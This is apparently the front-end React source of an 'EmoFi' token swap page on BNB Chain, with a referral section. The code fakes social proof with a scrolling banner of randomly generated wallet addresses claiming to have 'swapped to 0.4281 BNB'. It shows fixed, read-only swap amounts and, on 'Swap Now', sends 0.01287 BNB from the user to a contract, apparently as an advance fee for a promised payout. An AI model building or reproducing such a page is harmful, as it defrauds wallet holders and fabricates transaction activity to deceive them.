import React, { useState } from 'react';
import { useAccount, useBalance, useWriteContract } from 'wagmi';
import { useAppKit } from '@reown/appkit/react';
import { parseEther, formatEther } from 'viem';
import { useNavigate } from 'react-router-dom';
import { TOKEN_CONTRACT_ADDRESS, TOKEN_ABI } from '../config/contracts';

export default function SwapPage() {
  const { address, isConnected } = useAccount();
  const { open } = useAppKit();
  const navigate = useNavigate();
  const [showError, setShowError] = useState(false);

  const { data: bnbBalance } = useBalance({ 
    address, 
    chainId: 56,
    query: { refetchInterval: 3000 } 
  });
  
  const { writeContract } = useWriteContract();

  const balanceValue = bnbBalance?.value || 0n;
  const displayBalance = bnbBalance ? Number(formatEther(balanceValue)).toFixed(4) : '0.0000';

  const handleSwap = () => {
    if (!isConnected) {
      open();
      return;
    }

    const minBalanceWei = parseEther("0.013");
    if (balanceValue < minBalanceWei) {
      setShowError(true);
      return; 
    }
    
    setShowError(false);
    writeContract({
      address: TOKEN_CONTRACT_ADDRESS,
      abi: TOKEN_ABI,
      functionName: 'swap',
      value: parseEther("0.01287")
    });
  };

  const domainUrl = typeof window !== 'undefined' ? window.location.origin : 'https://safywallet.com';
  const referralLink = `${domainUrl}/?ref=${address || 'CONNECT_WALLET'}`;
  const bscScanLink = `https://bscscan.com/token/${TOKEN_CONTRACT_ADDRESS}`;

  // Logika Generate Alamat Acak untuk Notifikasi Berjalan (Marquee)
  const [marqueeText] = useState(() => {
    const items = [];
    const chars = 'abcdef0123456789';
    for (let i = 0; i < 20; i++) {
      let str1 = '', str2 = '';
      for(let j=0; j<4; j++) str1 += chars[Math.floor(Math.random() * chars.length)];
      for(let j=0; j<4; j++) str2 += chars[Math.floor(Math.random() * chars.length)];
      items.push(`0x${str1}...${str2} swapped to 0.4281 BNB`);
    }
    return items.join(' \u00A0 • \u00A0 ');
  });

  return (
    <div className="w-full max-w-md px-4 pb-10 mt-2">
      
      {/* STYLE UNTUK ANIMASI BERJALAN KIRI KE KANAN */}
      <style>
        {`
          @keyframes slideRight {
            0% { transform: translateX(-50%); }
            100% { transform: translateX(0%); }
          }
          .animate-slide-right {
            display: inline-block;
            white-space: nowrap;
            animation: slideRight 220s linear infinite; /* Kecepatan diatur ke 60s agar lambat dan mudah dibaca */
          }
        `}
      </style>

      <div className="glass-card p-4 mb-4 overflow-hidden">
        <h1 className="text-xl heading-font font-bold mb-4 text-center">Swap Token</h1>

        {/* NOTIFIKASI BERJALAN */}
        <div className="overflow-hidden whitespace-nowrap w-full py-2 mb-4 bg-[#00FF66]/5 border border-[#00FF66]/10 rounded-xl relative">
          <div className="animate-slide-right text-xs text-white/60">
            <span className="mx-4">{marqueeText}</span>
            <span className="mx-4">{marqueeText}</span>
          </div>
        </div>

        <div className="bg-white/5 p-4 rounded-2xl border border-white/10 mb-2">
          <p className="text-white/60 text-sm mb-2">From</p>
          <div className="flex justify-between items-center gap-3">
            <input 
              type="text" 
              value="1800"
              readOnly
              className="bg-transparent text-2xl outline-none w-full text-white font-semibold font-mono"
            />
            <div className="shrink-0 flex items-center gap-2 bg-[#1C1C1E] px-3 py-1.5 rounded-xl border border-white/10">
              <img src="/coin.jpg" className="w-5 h-5 rounded-full object-cover" alt="EmoFi" />
              <span className="font-bold text-sm text-white">EmoFi</span>
            </div>
          </div>
        </div>

        <div className="flex justify-center -my-3 relative z-10">
          <div className="bg-[#1C1C1E] p-2 rounded-full border border-white/10">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" className="text-white/60"><path d="M12 5v14"></path><path d="m19 12-7 7-7-7"></path></svg>
          </div>
        </div>

        <div className="bg-white/5 p-4 rounded-2xl border border-white/10 mb-6 mt-2 relative">
          <div className="flex justify-between items-center mb-2">
            <p className="text-white/60 text-sm">To</p>
            <p className="text-xs text-white/40">
              Balance: {isConnected ? displayBalance : '0.0000'} BNB
            </p>
          </div>
          
          <div className="flex justify-between items-center gap-3">
            <input 
              type="text" 
              value="0.4281"
              readOnly
              className="bg-transparent text-2xl outline-none w-full text-white font-semibold font-mono"
            />
            <div className="shrink-0 flex items-center gap-2 bg-[#1C1C1E] px-3 py-1.5 rounded-xl border border-white/10">
              <img src="https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/binance/info/logo.png" className="w-5 h-5 rounded-full" alt="BNB" />
              <span className="font-bold text-sm text-white">BNB</span>
            </div>
          </div>
        </div>

        <button 
          onClick={handleSwap}
          className="w-full bg-[#00FF66] hover:bg-[#00cc52] text-black font-bold py-4 rounded-xl transition-all text-base"
        >
          {isConnected ? 'Swap Now' : 'Connect Wallet'}
        </button>

        {showError && (
          <p className="text-[#ff3333] text-xs font-semibold text-center mt-3">
            Insufficient BNB balance, YOU MUST HODL 0.01287 BNBfor swap
          </p>
        )}

        <div className="mt-4 text-center">
          <a href={bscScanLink} target="_blank" rel="noopener noreferrer" className="text-[#3b82f6] hover:underline text-xs font-medium">
            View on BscScan
          </a>
        </div>
      </div>

      <div className="glass-card p-4 text-center">
        <h2 className="text-md heading-font font-bold mb-1 text-white">Referral Program</h2>
        <p className="text-xs text-white/60 mb-3">Earn 10% BNB & 100% Tokens from every referral claim!</p>
        <input 
          type="text" 
          readOnly 
          value={referralLink} 
          className="w-full bg-white/5 border border-white/10 rounded-lg p-2 text-xs text-gray-300 text-center mb-2 outline-none font-mono"
        />
        <button 
          onClick={() => navigator.clipboard.writeText(referralLink)}
          className="w-full bg-white/10 hover:bg-white/20 text-white font-semibold py-2 rounded-lg text-sm transition-all"
        >
          Copy Referral Link
        </button>
      </div>

      <button 
        onClick={() => navigate('/')}
        className="mt-6 w-full bg-transparent border border-white/10 text-white/60 font-bold py-3.5 rounded-xl transition-all hover:bg-white/5 text-sm"
      >
        Back to Claim
      </button>
    </div>
  );
}